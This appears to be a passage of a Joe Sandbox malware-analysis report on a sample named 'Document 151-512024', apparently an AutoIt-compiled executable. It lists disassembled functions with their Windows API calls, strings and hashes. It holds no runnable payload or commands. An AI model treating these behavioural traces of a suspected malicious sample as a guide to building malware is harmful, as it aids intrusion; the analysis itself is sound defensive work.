Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 392f20c861ceb365f8a8bc801bc3f059934589468a3510a89a47ed78a0c517f2
Instruction ID: 36e26da03d2a14ec46e05fbff991219675edfc3090b1e3fc24e7cc2effd599b8
Opcode Fuzzy Hash: 392f20c861ceb365f8a8bc801bc3f059934589468a3510a89a47ed78a0c517f2
Instruction Fuzzy Hash: 10F0B4B219612ABBEB205B529C0DEEF7F7CEFCBB11F00015AF601D1090D7A05A41D6B4

Function 00997439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00997452
SendMessageW.USER32(?,00001328,00000000,?), ref: 00997469
GetWindowDC.USER32(?), ref: 00997475
GetPixel.GDI32(00000000,?,?), ref: 00997484
ReleaseDC.USER32(?,00000000), ref: 00997496
GetSysColor.USER32(00000005), ref: 009974B0

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 7ad74593071a6d1201ea558d5fdacf832962446aaefbd60364f4fc5cca01d760
Instruction ID: 8ab0523e97b6d28d9c7d956225a49ccab11d376be0a901fa9386d0f5755504ac
Opcode Fuzzy Hash: 7ad74593071a6d1201ea558d5fdacf832962446aaefbd60364f4fc5cca01d760
Instruction Fuzzy Hash: 36017871469216FFEB509FA4DC08BAABBB6FB04311F540161FA16A21A1CF311E81EB10

Function 009A1874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 009A187F
UnloadUserProfile.USERENV(?,?), ref: 009A188B
CloseHandle.KERNEL32(?), ref: 009A1894
CloseHandle.KERNEL32(?), ref: 009A189C
GetProcessHeap.KERNEL32(00000000,?), ref: 009A18A5
HeapFree.KERNEL32(00000000), ref: 009A18AC

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: d905fdb7e460820356dad6e75475d6669f99c52ae4757f5c9e0d441cfdcdcaee
Instruction ID: 9702508d62021e8cc4bafb50161e4eb9359d6b0c942ee7d224594b5ee2c0cebf
Opcode Fuzzy Hash: d905fdb7e460820356dad6e75475d6669f99c52ae4757f5c9e0d441cfdcdcaee
Instruction Fuzzy Hash: D1E0EDB609D112FBDB016FA1ED0C905FF39FF497627108222F225810B0CB3254A0EF50

Function 009CAD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 009CAEA3

Part of subcall function 00947620: _wcslen.LIBCMT ref: 00947625

GetProcessId.KERNEL32(00000000), ref: 009CAF38
CloseHandle.KERNEL32(00000000), ref: 009CAF67

Strings

@, xrefs: 009CAE72
<, xrefs: 009CAE6B

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: f53964a8a2091bec8022a94dd0cbe681d7a0b23581cde2b484dfb122b22e8d80
Instruction ID: 03441a088f5904497f38f96d906b5d15300fc2990ad61d86b43b0129b3e9995b
Opcode Fuzzy Hash: f53964a8a2091bec8022a94dd0cbe681d7a0b23581cde2b484dfb122b22e8d80
Instruction Fuzzy Hash: 92713571A00619DFCB14DF94C485A9EBBB4EF48314F04889DE816AB3A2C775ED45CB92

Function 009D6278 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00EDFC50,?), ref: 009D62E2
ScreenToClient.USER32(?,?), ref: 009D6315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 009D6382

Strings

0n, xrefs: 009D62B1, 009D63AC

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID: 0n
API String ID: 3880355969-3368625520
Opcode ID: 8f6c9982d525761ded109a76aee8eba17f82fb143ce18fdb94daf6f550ff1655
Instruction ID: 7decfe9b77885bd896532e0a30f1079f3cb61b894ad405e00ad96a31ab18cc03
Opcode Fuzzy Hash: 8f6c9982d525761ded109a76aee8eba17f82fb143ce18fdb94daf6f550ff1655
Instruction Fuzzy Hash: FC512D74940205AFDF10DF68D980AAE7BB9EF55360F10825AF96597390D730ED81CB50

Function 009A719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 009A7206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 009A723C
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 009A724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 009A72CF

Strings

DllGetClassObject, xrefs: 009A7242

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 9526dfe7a5565fc8b8028d9632109750ea043017572a29c5bf33f044b6ed1257
Instruction ID: e9569d0e38566dffab8dddc38e121c975a7d841cfcf6786949f962117c4e070d
Opcode Fuzzy Hash: 9526dfe7a5565fc8b8028d9632109750ea043017572a29c5bf33f044b6ed1257
Instruction Fuzzy Hash: 02418FB1604204EFDB15CF94CC86B9ABBB9EF85310F1480AABD059F20AD7B4D941CBE0

Function 009AC27D Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 009AC306
DeleteMenu.USER32(?,00000007,00000000), ref: 009AC34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00A11990,Pl), ref: 009AC395

Strings

0, xrefs: 009AC2DF
Pl, xrefs: 009AC28D

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0$Pl
API String ID: 135850232-2497859751
Opcode ID: 284c2069e127ef349de2847dee52048c25c4605414555a5ce4bc84eec1ba1117
Instruction ID: 3ce2becc92f8acaf5b7a126082913135a759ace339d43ded15b0c915cb7a3bd4
Opcode Fuzzy Hash: 284c2069e127ef349de2847dee52048c25c4605414555a5ce4bc84eec1ba1117
Instruction Fuzzy Hash: 0F41A3B12083019FDB24DF25D844F5ABBE8AFC6311F148A1DF9A59B2D1DB70E904CB92

Function 009D52C1 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 009D5352
GetWindowLongW.USER32(?,000000F0), ref: 009D5375
SetWindowLongW.USER32(?,000000F0,00000000), ref: 009D5382
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009D53A8

Strings

0n, xrefs: 009D52F1

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID: 0n
API String ID: 3340791633-3368625520
Opcode ID: 0925d2fda94406f39b30853c5f00f3aaaca540ebd07a9273f183f30a124add47
Instruction ID: 678290fb128286dda8772709b3fbd62fa42d770a28af14993c1160b92820704f
Opcode Fuzzy Hash: 0925d2fda94406f39b30853c5f00f3aaaca540ebd07a9273f183f30a124add47
Instruction Fuzzy Hash: 3D31C074AD5A08EFEB349E54CC06BE8B76AAB043D0F59C503FA10963E1C7B49D90EB41

Function 009D7674 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 009D769A
GetWindowRect.USER32(?,?), ref: 009D7710
PtInRect.USER32(?,?,009D8B89), ref: 009D7720
MessageBeep.USER32(00000000), ref: 009D778C

Strings

0n, xrefs: 009D76D6, 009D7733

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID: 0n
API String ID: 1352109105-3368625520
Opcode ID: cc62cadfee94b26a875aa55dd8da179da3c019c38c45c532edc082ad1d05075b
Instruction ID: 93cefd06f2ead39ea8e32428aa88017dae32c90f490a79dbb0758ba9befaab44
Opcode Fuzzy Hash: cc62cadfee94b26a875aa55dd8da179da3c019c38c45c532edc082ad1d05075b
Instruction Fuzzy Hash: 09417C34A492159FCB01CFE8C894EA9B7F9BB49314F15C5AAE5249B361E730E942CB90

Function 009D4653 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 009D4705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 009D4713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 009D471A

Strings

0n, xrefs: 009D46D0, 009D46EF
msctls_updown32, xrefs: 009D4684

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: 0n$msctls_updown32
API String ID: 4014797782-1044086328
Opcode ID: db0389bc83cf486073273f8d5591cd2b379e5f2516621d483892ac4593fe64f5
Instruction ID: 78d8bd83dac038fed33af35d8294d4ad5de996fc98ee51857885946eb6b6f6c9
Opcode Fuzzy Hash: db0389bc83cf486073273f8d5591cd2b379e5f2516621d483892ac4593fe64f5
Instruction Fuzzy Hash: C02160B5645209AFDB10DF64DCC1DB737ADEB8A3A4B44445AFA009B391CB31EC51CA60

Function 009D37B7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 009D3840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 009D3850
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 009D3876

Strings

_____________________________________________________________________________________________________________________________abccccccccdeefghijklmnopqrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstyzzzzzzzzzzzzzzzz{{{{{{, xrefs: 009D37C7
Listbox, xrefs: 009D380F

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox$_____________________________________________________________________________________________________________________________abccccccccdeefghijklmnopqrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstyzzzzzzzzzzzzzzzz{{{{{{
API String ID: 3315199576-2916758532
Opcode ID: 9d182435eb2b8230ac331f436b637dcaee5760b166cceba86d275cbcd4212f8f
Instruction ID: 60d0eedaf7a7b9baf038f2a28da0dcbb258becaede67e44ba4193e5339f80e5b
Opcode Fuzzy Hash: 9d182435eb2b8230ac331f436b637dcaee5760b166cceba86d275cbcd4212f8f
Instruction Fuzzy Hash: 8A21C272650119BBEF118F54DC85FBB376EEF89754F10C115F9009B290CA71DC5297A0

Function 009D8FC9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00959BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00959BB2

GetCursorPos.USER32(?), ref: 009D9001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00997711,?,?,?,?,?), ref: 009D9016
GetCursorPos.USER32(?), ref: 009D905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00997711,?,?,?), ref: 009D9094

Strings

0n, xrefs: 009D902E, 009D9064

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID: 0n
API String ID: 2864067406-3368625520
Opcode ID: ff8a5f5c0f9b200b037911382f09e8d7b5705e44244cf4e66d2c07df47b2cf63
Instruction ID: 880285031008f0bae505918ea34ae876cb8daf3d51c2a4ba5dd2f59c82996a49
Opcode Fuzzy Hash: ff8a5f5c0f9b200b037911382f09e8d7b5705e44244cf4e66d2c07df47b2cf63
Instruction Fuzzy Hash: 7121D135601018EFDB25EF94EC58EFA3BB9EF89351F04C156F90587261C3359990EB60

Function 009D2F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 009D2F8D
LoadLibraryW.KERNEL32(?), ref: 009D2F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 009D2FA9
DestroyWindow.USER32(?), ref: 009D2FB1

Strings

SysAnimate32, xrefs: 009D2F68

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: 1fb9812c104a32af344de2f89ee7c99ca0de7528070435776e64f45b7d8c66d8
Instruction ID: a29eb7795bb10b432609a40bf33c5ff8f3898cfb46fb811134cef100bd902d16
Opcode Fuzzy Hash: 1fb9812c104a32af344de2f89ee7c99ca0de7528070435776e64f45b7d8c66d8
Instruction Fuzzy Hash: 6C21C071254205AFEB104FA8DC80FBB37BDEF69364F108A1AFA50D2290D771DC91A760

Function 00964D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00964D1E,009728E9,?,00964CBE,009728E9,00A088B8,0000000C,00964E15,009728E9,00000002), ref: 00964D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00964DA0
FreeLibrary.KERNEL32(00000000,?,?,?,00964D1E,009728E9,?,00964CBE,009728E9,00A088B8,0000000C,00964E15,009728E9,00000002,00000000), ref: 00964DC3

Strings

mscoree.dll, xrefs: 00964D86
CorExitProcess, xrefs: 00964D98

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 4d37c8f19f6a443f2438b0fddd22ae22e485289646254ba85d39bcb0736af562
Instruction ID: 6d2da0070b2ddec187b671a429e2022838ad00e76a22c5592bb7358729a14a3c
Opcode Fuzzy Hash: 4d37c8f19f6a443f2438b0fddd22ae22e485289646254ba85d39bcb0736af562
Instruction Fuzzy Hash: F7F0C270A95219FBDB119FD0DC49BAEBFB8EF84751F0001A5F805A22A0CF716D80DB90

Function 00944E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00944EDD,?,00A11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00944E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00944EAE
FreeLibrary.KERNEL32(00000000,?,?,00944EDD,?,00A11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00944EC0

Strings

Wow64DisableWow64FsRedirection, xrefs: 00944EA8
kernel32.dll, xrefs: 00944E94

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 7441ed6edf19ccdb5bd15df199c57149a21167f9a4233e0bdc41d15e415ff911
Instruction ID: d610d9bfeeb912841599b36fc4b5e102808d16fdbcc87f94067ecc18fd2ea933
Opcode Fuzzy Hash: 7441ed6edf19ccdb5bd15df199c57149a21167f9a4233e0bdc41d15e415ff911
Instruction Fuzzy Hash: 70E08C76A9A633ABD3221B25AC2CF6B665CAF81B62B050116FC00E2250DF64CD42D0A0

Function 00944E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00983CDE,?,00A11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00944E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00944E74
FreeLibrary.KERNEL32(00000000,?,?,00983CDE,?,00A11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00944E87

Strings

kernel32.dll, xrefs: 00944E5B
Wow64RevertWow64FsRedirection, xrefs: 00944E6E

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 67e99f31e5a5f056141bb230964c251a97958fb9339f5148ae65e74bdf00b57e
Instruction ID: 56bc85364b21d2ca79f34ac87456d27d6acf4c6cbc36f8ccc48a496483c1a4ca
Opcode Fuzzy Hash: 67e99f31e5a5f056141bb230964c251a97958fb9339f5148ae65e74bdf00b57e
Instruction Fuzzy Hash: DDD0C23255B633678A221B247C08E8B6B1CAF81B113050613B801E3150CF20CD41D1D1

Function 009CA387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 009CA427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 009CA435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 009CA468
CloseHandle.KERNEL32(?), ref: 009CA63D

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 423076d617df01a9100b75550c4d54cf41f38175f80d47c9b5372f70627f1de4
